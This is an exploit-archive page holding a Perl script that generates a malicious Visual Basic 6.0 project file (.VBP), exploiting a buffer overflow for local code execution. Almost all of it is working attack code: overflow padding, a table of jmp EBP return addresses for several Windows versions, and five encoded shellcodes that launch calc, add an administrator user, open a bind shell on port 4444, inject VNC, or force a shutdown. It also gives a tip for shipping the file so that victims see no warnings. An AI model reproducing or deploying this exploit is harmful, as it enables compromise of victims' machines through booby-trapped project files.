[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec Exploit
# Published : 2007-09-04
# Author : Koshi
# Previous Title : Virtual DJ 5.0 (m3u File) Local Buffer OverFlow Exploit
# Next Title : Norman Virus Control nvcoaft51.sys ioctl BF672028 Exploit
#!/usr/bin/perl
#' ++ Microsoft Visual Basic 6.0 Code Execution 0-Day ++
#' ++++++++++++++++++++++++++++++++++++++++++++++++++++++
#'++ Author: Koshi +
#'++ Email: heykoshi at gmail dot com +
#'++ Application: Microsoft Visual Basic 6.0 +
#'++ +
#'++ Tested on Microsoft Windows XP Home Edition SP2 +
#'++ Patched & Updated +
#'++ +
#'++ The vulnerable buffer exsists in the .VBP files of +
#'++ Visual Basic projects. You can jump directly to +
#'++ the shellcode, or jump to it via EBP. +
#'++ +
#'++ There is NO restriction of shellcode size either. +
#'++ +
#'++ Gr33tz: Rima my baby who I love and adore, Draven +
#'++ for pointing me in the right direction, as always. +
#'++ +
#'++ +
#'++ This exploit is for educational use only, blah. +
#'++ +
#'++ +
#'+++++++++++++++++++++++++++++++++++++++++++++++++++++++
#'+++++++++++++++++++++++++++++++++++++++++++++++++++++
#
# Ex. of Usage:
# perl vb6.pl 1 >>Project.vbp
#
#
$begin0 = "x54x79x70x65x3Dx45x78x65x0Dx0Ax46x6Fx72x6D".
"x3Dx46x6Fx72x6Dx31x2Ex66x72x6Dx0Dx0A";
$begin1 = "x52x65x66x65x72x65x6Ex63x65x3D".
"x2Ax5Cx47x7Bx30x30x30x32x30x34x33x30x2Dx30".
"x30x30x30x2Dx30x30x30x30x2Dx43x30x30x30x2D".
"x30x30x30x30x30x30x30x30x30x30x34x36x7Dx23".
"x32x2Ex30x23x30x23x2Ex2Ex5Cx2Ex2Ex5Cx2Ex2E".
"x5Cx2Ex2Ex5Cx2Ex2Ex5Cx57x49x4Ex44x4Fx57x53".
"x5Cx73x79x73x74x65x6Dx33x32x5Cx73x74x64x6F".
"x6Cx65x32x2Ex74x6Cx62x23x4Fx4Cx45x20x41x75".
"x74x6Fx6Dx61x74x69x6Fx6E";
$begin2 = "x0Dx0Ax53x74x61x72x74x75x70x3Dx22x46x6Fx72x6Dx31x22x0Dx0A".
"x43x6Fx6Dx6Dx61x6Ex64x33x32x3Dx22x22";
$BuffOf = "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41";
$codeAddr = "x83x25x40x01";
# You can most likely use a call or a push, you could probably use them from kernel32.dll too.
#* ntdll.dll - 0x7C923DA3 jmp Ebp **** Is the one i have used in this example.
# 0x77f6d42f jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32)
# 0x77f7d9b6 jmp ebp ntdll.dll (English / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)
# 0x77f8c449 jmp ebp ntdll.dll (English / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)
# 0x77faa6ce jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32)
# 0x7c85eb73 jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)
# 0x7c8839ed jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)
#*0x7c923da3 jmp ebp ntdll.dll (English / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32)
# 0x77f8c449 jmp ebp ntdll.dll (French / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)
# 0x77f6d9b6 jmp ebp ntdll.dll (German / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)
# 0x7c933da3 jmp ebp ntdll.dll (German / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32)
# 0x77f5d42f jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions
# 0x77f6d9b6 jmp ebp ntdll.dll (Italian / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)
# 0x77f8c449 jmp ebp ntdll.dll (Italian / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)
# 0x77f9a6ce jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions
# 0x7c96eb73 jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions
# 0x7c9939ed jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions
# ...backwards..if you don't know why, then gtfo.
$jmpEbp = "xA3x3Dx92x7C";
$fourSkin = "x44x44x44x44";
$begin3 = "x0Dx0Ax4Ex61x6Dx65x3Dx22x50x72x6Fx6Ax65x63".
"x74x31x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41";
$koshi = "x0Dx0Ax48x65x6Cx70x43x6Fx6Ex74x65x78x74x49x44x3Dx22x30x22x0Dx0Ax43x6Fx6D".
"x70x61x74x69x62x6Cx65x4Dx6Fx64x65x3Dx22x30x22x0Dx0Ax4Dx61x6Ax6Fx72x56x65".
"x72x3Dx31x0Dx0Ax4Dx69x6Ex6Fx72x56x65x72x3Dx30x0Dx0Ax52x65x76x69x73x69x6F".
"x6Ex56x65x72x3Dx30x0Dx0Ax41x75x74x6Fx49x6Ex63x72x65x6Dx65x6Ex74x56x65x72".
"x3Dx30x0Dx0Ax53x65x72x76x65x72x53x75x70x70x6Fx72x74x46x69x6Cx65x73x3Dx30".
"x0Dx0Ax43x6Fx6Dx70x69x6Cx61x74x69x6Fx6Ex54x79x70x65x3Dx30x0Dx0Ax4Fx70x74".
"x69x6Dx69x7Ax61x74x69x6Fx6Ex54x79x70x65x3Dx30x0Dx0Ax46x61x76x6Fx72x50x65".
"x6Ex74x69x75x6Dx50x72x6Fx28x74x6Dx29x3Dx30x0Dx0Ax43x6Fx64x65x56x69x65x77".
"x44x65x62x75x67x49x6Ex66x6Fx3Dx30x0Dx0Ax4Ex6Fx41x6Cx69x61x73x69x6Ex67x3D".
"x30x0Dx0Ax42x6Fx75x6Ex64x73x43x68x65x63x6Bx3Dx30x0Dx0Ax4Fx76x65x72x66x6C".
"x6Fx77x43x68x65x63x6Bx3Dx30x0Dx0Ax46x6Cx50x6Fx69x6Ex74x43x68x65x63x6Bx3D".
"x30x0Dx0Ax46x44x49x56x43x68x65x63x6Bx3Dx30x0Dx0Ax55x6Ex72x6Fx75x6Ex64x65".
"x64x46x50x3Dx30x0Dx0Ax53x74x61x72x74x4Dx6Fx64x65x3Dx30x0Dx0Ax55x6Ex61x74".
"x74x65x6Ex64x65x64x3Dx30x0Dx0Ax52x65x74x61x69x6Ex65x64x3Dx30x0Dx0Ax54x68".
"x72x65x61x64x50x65x72x4Fx62x6Ax65x63x74x3Dx30x0Dx0Ax4Dx61x78x4Ex75x6Dx62".
"x65x72x4Fx66x54x68x72x65x61x64x73x3Dx31x0Dx0Ax0Dx0Ax5Bx4Dx53x20x54x72x61".
"x6Ex73x61x63x74x69x6Fx6Ex20x53x65x72x76x65x72x5Dx0Dx0Ax41x75x74x6Fx52x65".
"x66x72x65x73x68x3Dx31x0Dx0A";
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
$shellc1 = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34".
"x42x50x42x30x42x50x4bx38x45x44x4ex43x4bx38x4ex47".
"x45x30x4ax47x41x30x4fx4ex4bx48x4fx54x4ax41x4bx38".
"x4fx55x42x52x41x30x4bx4ex49x54x4bx48x46x33x4bx48".
"x41x50x50x4ex41x43x42x4cx49x59x4ex4ax46x48x42x4c".
"x46x47x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e".
"x46x4fx4bx43x46x35x46x52x46x30x45x37x45x4ex4bx58".
"x4fx45x46x42x41x50x4bx4ex48x46x4bx48x4ex30x4bx44".
"x4bx48x4fx35x4ex41x41x30x4bx4ex4bx38x4ex51x4bx38".
"x41x50x4bx4ex49x38x4ex45x46x32x46x50x43x4cx41x33".
"x42x4cx46x46x4bx48x42x34x42x33x45x38x42x4cx4ax47".
"x4ex30x4bx38x42x34x4ex50x4bx58x42x47x4ex41x4dx4a".
"x4bx58x4ax36x4ax30x4bx4ex49x50x4bx48x42x48x42x4b".
"x42x30x42x50x42x30x4bx38x4ax56x4ex43x4fx55x41x33".
"x48x4fx42x46x48x35x49x38x4ax4fx43x58x42x4cx4bx37".
"x42x55x4ax36x42x4fx4cx58x46x50x4fx35x4ax36x4ax59".
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x56x41x56".
"x4ex46x43x56x50x32x45x46x4ax37x45x36x42x50x5a";
# win32_adduser - PASS=koshi EXITFUNC=seh USER=4dmin Size=495 Encoder=PexAlphaNum http://metasploit.com
$shellc2 = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44".
"x42x30x42x50x42x30x4bx48x45x44x4ex53x4bx38x4ex37".
"x45x50x4ax47x41x50x4fx4ex4bx38x4fx54x4ax51x4bx58".
"x4fx35x42x52x41x30x4bx4ex49x54x4bx38x46x53x4bx48".
"x41x30x50x4ex41x53x42x4cx49x39x4ex4ax46x48x42x4c".
"x46x57x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e".
"x46x4fx4bx53x46x55x46x52x46x30x45x47x45x4ex4bx48".
"x4fx45x46x42x41x50x4bx4ex48x46x4bx48x4ex50x4bx54".
"x4bx48x4fx55x4ex51x41x50x4bx4ex4bx58x4ex51x4bx58".
"x41x30x4bx4ex49x38x4ex55x46x42x46x30x43x4cx41x33".
"x42x4cx46x46x4bx58x42x34x42x53x45x48x42x4cx4ax37".
"x4ex30x4bx48x42x44x4ex30x4bx48x42x37x4ex51x4dx4a".
"x4bx58x4ax36x4ax30x4bx4ex49x50x4bx48x42x48x42x4b".
"x42x30x42x30x42x50x4bx58x4ax36x4ex53x4fx45x41x53".
"x48x4fx42x36x48x45x49x38x4ax4fx43x48x42x4cx4bx57".
"x42x55x4ax56x42x4fx4cx58x46x50x4fx55x4ax46x4ax59".
"x50x4fx4cx58x50x30x47x35x4fx4fx47x4ex43x36x4dx46".
"x46x56x50x42x45x36x4ax37x45x56x42x32x4fx52x43x46".
"x42x42x50x56x45x46x46x47x42x52x45x47x43x37x45x36".
"x44x57x42x42x46x53x46x36x4dx56x49x46x50x56x42x32".
"x4bx36x4fx36x43x37x4ax46x49x36x42x32x4fx42x41x34".
"x46x54x46x34x42x32x48x52x48x52x42x52x50x36x45x46".
"x46x57x42x42x4ex56x4fx36x43x36x41x36x4ex46x47x56".
"x44x37x4fx36x45x57x42x57x42x52x41x44x46x56x4dx56".
"x49x46x50x56x49x46x43x47x46x57x44x37x41x36x46x57".
"x4fx46x44x37x43x37x42x32x46x43x46x36x4dx56x49x36".
"x50x56x42x42x4fx32x41x44x46x54x46x54x42x50x5a";
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
$shellc3 = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e".
"x4dx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx38".
"x4ex36x46x52x46x32x4bx38x45x54x4ex53x4bx48x4ex37".
"x45x30x4ax47x41x30x4fx4ex4bx58x4fx44x4ax41x4bx58".
"x4fx45x42x52x41x50x4bx4ex49x44x4bx58x46x33x4bx48".
"x41x50x50x4ex41x33x42x4cx49x39x4ex4ax46x58x42x4c".
"x46x37x47x30x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e".
"x46x4fx4bx33x46x35x46x32x4ax32x45x57x45x4ex4bx48".
"x4fx35x46x32x41x30x4bx4ex48x36x4bx58x4ex30x4bx54".
"x4bx58x4fx35x4ex31x41x50x4bx4ex43x50x4ex52x4bx58".
"x49x58x4ex46x46x52x4ex31x41x46x43x4cx41x33x4bx4d".
"x46x46x4bx48x43x34x42x53x4bx58x42x54x4ex30x4bx48".
"x42x57x4ex31x4dx4ax4bx48x42x44x4ax50x50x45x4ax46".
"x50x38x50x34x50x50x4ex4ex42x55x4fx4fx48x4dx48x46".
"x43x45x48x56x4ax36x43x53x44x33x4ax46x47x57x43x37".
"x44x53x4fx55x46x35x4fx4fx42x4dx4ax56x4bx4cx4dx4e".
"x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx45x49x38x45x4e".
"x48x36x41x58x4dx4ex4ax50x44x30x45x45x4cx36x44x50".
"x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x45".
"x4fx4fx48x4dx43x45x43x45x43x55x43x55x43x55x43x54".
"x43x45x43x54x43x45x4fx4fx42x4dx48x46x4ax36x41x31".
"x4ex35x48x46x43x55x49x58x41x4ex45x59x4ax46x46x4a".
"x4cx41x42x47x47x4cx47x35x4fx4fx48x4dx4cx46x42x31".
"x41x55x45x55x4fx4fx42x4dx4ax46x46x4ax4dx4ax50x32".
"x49x4ex47x55x4fx4fx48x4dx43x55x45x55x4fx4fx42x4d".
"x4ax56x45x4ex49x44x48x38x49x34x47x55x4fx4fx48x4d".
"x42x45x46x45x46x45x45x35x4fx4fx42x4dx43x59x4ax36".
"x47x4ex49x47x48x4cx49x37x47x35x4fx4fx48x4dx45x45".
"x4fx4fx42x4dx48x56x4cx36x46x56x48x46x4ax36x43x46".
"x4dx36x49x38x45x4ex4cx46x42x35x49x45x49x32x4ex4c".
"x49x48x47x4ex4cx56x46x54x49x48x44x4ex41x43x42x4c".
"x43x4fx4cx4ax50x4fx44x54x4dx52x50x4fx44x54x4ex42".
"x43x59x4dx38x4cx47x4ax43x4bx4ax4bx4ax4bx4ax4ax36".
"x44x47x50x4fx43x4bx48x41x4fx4fx45x47x46x54x4fx4f".
"x48x4dx4bx45x47x45x44x35x41x35x41x45x41x55x4cx46".
"x41x30x41x45x41x45x45x45x41x45x4fx4fx42x4dx4ax36".
"x4dx4ax49x4dx45x30x50x4cx43x45x4fx4fx48x4dx4cx56".
"x4fx4fx4fx4fx47x33x4fx4fx42x4dx4bx48x47x35x4ex4f".
"x43x38x46x4cx46x36x4fx4fx48x4dx44x55x4fx4fx42x4d".
"x4ax56x42x4fx4cx58x46x50x4fx55x43x45x4fx4fx48x4d".
"x4fx4fx42x4dx5a";
# win32_bind_vncinject - VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com
$shellc4 = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ax4ex48x55x42x50".
"x42x30x42x30x43x55x45x35x48x45x47x45x4bx38x4ex36".
"x46x42x4ax31x4bx38x45x54x4ex33x4bx48x46x55x45x30".
"x4ax47x41x50x4cx4ex4bx58x4cx54x4ax31x4bx48x4cx55".
"x42x42x41x50x4bx4ex43x4ex44x43x49x54x4bx58x46x33".
"x4bx48x41x30x50x4ex41x33x4fx4fx4ex4fx41x43x42x4c".
"x4ex4ax4ax53x42x4ex46x57x47x30x41x4cx4fx4cx4dx30".
"x41x30x47x4cx4bx4ex44x4fx4bx33x4ex47x46x42x46x51".
"x45x37x41x4ex4bx38x4cx35x46x52x41x30x4bx4ex48x56".
"x4bx58x4ex50x4bx54x4bx48x4cx55x4ex51x41x30x4bx4e".
"x4bx58x46x30x4bx58x41x50x4ax4ex4bx4ex44x50x41x43".
"x42x4cx4fx35x50x35x4dx35x4bx45x44x4cx4ax50x42x50".
"x50x55x4cx36x42x33x49x55x46x46x4bx58x49x31x4bx38".
"x4bx45x4ex50x4bx38x4bx35x4ex31x4bx48x4bx51x4bx58".
"x4bx45x4ax30x43x55x4ax56x50x38x50x34x50x50x4ex4e".
"x4fx4fx48x4dx49x48x47x4cx41x58x4ex4ex42x50x41x50".
"x42x50x42x30x47x45x48x55x43x45x49x38x45x4ex4ax4e".
"x47x52x42x30x42x30x42x30x42x59x41x50x42x30x42x50".
"x48x4bx49x51x4ax51x47x4ex46x4ax49x31x42x47x49x4e".
"x45x4ex49x54x48x58x49x54x46x4ax4cx51x42x37x47x4c".
"x46x4ax4dx4ax50x42x49x4ex49x4dx49x50x45x4fx4dx4a".
"x4bx4cx4dx4ex4ex4fx4bx43x47x45x43x35x44x33x4fx45".
"x43x33x44x43x42x30x4bx45x4dx38x4bx34x42x42x41x55".
"x4fx4fx47x4dx49x58x4fx4dx49x38x43x4cx4dx58x45x47".
"x46x41x4cx36x47x30x49x45x41x35x43x45x4fx4fx46x43".
"x4fx38x4fx4fx45x35x46x50x49x35x49x58x46x50x50x48".
"x44x4ex44x4fx4bx32x47x52x46x35x4fx4fx47x43x4fx4f".
"x45x35x42x43x41x53x42x4cx42x45x42x35x42x35x42x55".
"x42x54x42x55x42x44x42x35x4fx4fx45x45x4ex32x49x48".
"x47x4cx41x53x4bx4dx43x45x43x45x4ax46x44x30x42x50".
"x41x31x4ex55x49x48x42x4ex4cx36x42x31x42x35x47x55".
"x4fx4fx45x35x46x32x43x55x47x45x4fx4fx45x45x4ax32".
"x43x55x46x35x47x45x4fx4fx45x55x42x32x49x48x47x4c".
"x41x58x4ex4ex42x50x42x31x42x50x42x50x49x58x43x4e".
"x4cx46x42x50x4ax46x42x30x42x51x42x30x42x30x43x35".
"x47x45x4fx4fx45x35x4ax31x41x58x4ex4ex42x30x46x30".
"x42x30x42x30x4fx4fx43x4dx5a";
# win32_exec - EXITFUNC=seh CMD=shutdown -c "HAI VEn0m pwn3d j00r b0x0r wif k0sh1 u b1tch" Size=451 Encoder=PexAlphaNum http://metasploit.com
$shellc5 = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34".
"x42x50x42x50x42x30x4bx38x45x54x4ex43x4bx38x4ex47".
"x45x30x4ax47x41x30x4fx4ex4bx38x4fx54x4ax51x4bx48".
"x4fx35x42x32x41x50x4bx4ex49x54x4bx38x46x43x4bx48".
"x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c".
"x46x47x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e".
"x46x4fx4bx53x46x55x46x32x46x30x45x37x45x4ex4bx38".
"x4fx55x46x52x41x50x4bx4ex48x56x4bx48x4ex50x4bx34".
"x4bx38x4fx45x4ex31x41x30x4bx4ex4bx38x4ex31x4bx48".
"x41x50x4bx4ex49x48x4ex35x46x32x46x50x43x4cx41x43".
"x42x4cx46x56x4bx48x42x34x42x43x45x58x42x4cx4ax37".
"x4ex50x4bx38x42x34x4ex50x4bx38x42x57x4ex51x4dx4a".
"x4bx58x4ax36x4ax50x4bx4ex49x30x4bx58x42x58x42x4b".
"x42x50x42x30x42x50x4bx48x4ax46x4ex43x4fx45x41x53".
"x48x4fx42x36x48x35x49x48x4ax4fx43x58x42x4cx4bx37".
"x42x45x4ax56x42x4fx4cx48x46x30x4fx55x4ax56x4ax39".
"x50x4fx4cx58x50x50x47x45x4fx4fx47x4ex43x37x4ax56".
"x45x47x46x37x46x46x4fx36x47x37x50x46x42x42x4dx42".
"x43x36x42x42x44x42x4ax34x41x54x49x34x42x42x48x35".
"x45x34x50x56x42x33x4dx56x42x52x42x57x47x57x50x56".
"x43x33x46x36x42x32x4cx46x42x33x42x33x44x37x42x32".
"x44x46x42x53x4ax57x42x33x44x47x42x52x47x47x49x56".
"x48x46x42x52x4bx56x42x33x43x57x4ax56x41x53x42x32".
"x45x37x42x32x44x56x41x43x46x37x43x46x4ax56x44x32".
"x42x30x5a";
$endQuote = "x22";
$i = $ARGV[0];
if ($i==1){
print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc1$endQuote$koshi";
exit;
}
if ($i==2){
print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc2$endQuote$koshi";
exit;
}
if ($i==3){
print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc3$endQuote$koshi";
exit;
}
if ($i==4){
print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc4$endQuote$koshi";
exit;
}
if ($i==5){
print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc5$endQuote$koshi";
exit;
}
print "n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++n";
print " +++ +++n";
print " +++ +++n";
print " +++ Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec +++n";
print " +++ Written By Koshi +++n";
print " +++ Greets: Rima my baby! Draven, thanks for helping. +++n";
print " +++ +++n";
print " +++ Usage Ex.: ./vb6.pl 1 >>Project1.vbp +++n";
print " +++ +++n";
print " +++ Options: +++n";
print " +++ 1 - win32_exec CALC.EXE +++n";
print " +++ 2 - win32_adduser Pass=4dmin User=koshi +++n";
print " +++ 3 - win32_bind Port 4444 +++n";
print " +++ 4 - win32_bind_vncinject Port 5900 +++n";
print " +++ 5 - win32_exec shutdown -c x22HAI VEn0m pw.. +++n";
print " +++ +++n";
print " +++ +++n";
print " +++ Notes: Ship final .VBP file with a .FRM file to avoid +++n";
print " +++ warnings in Visual Basic 6.0 +++n";
print " +++ +++n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++n";
exit;
#EOF
# www.Syue.com [2007-09-04]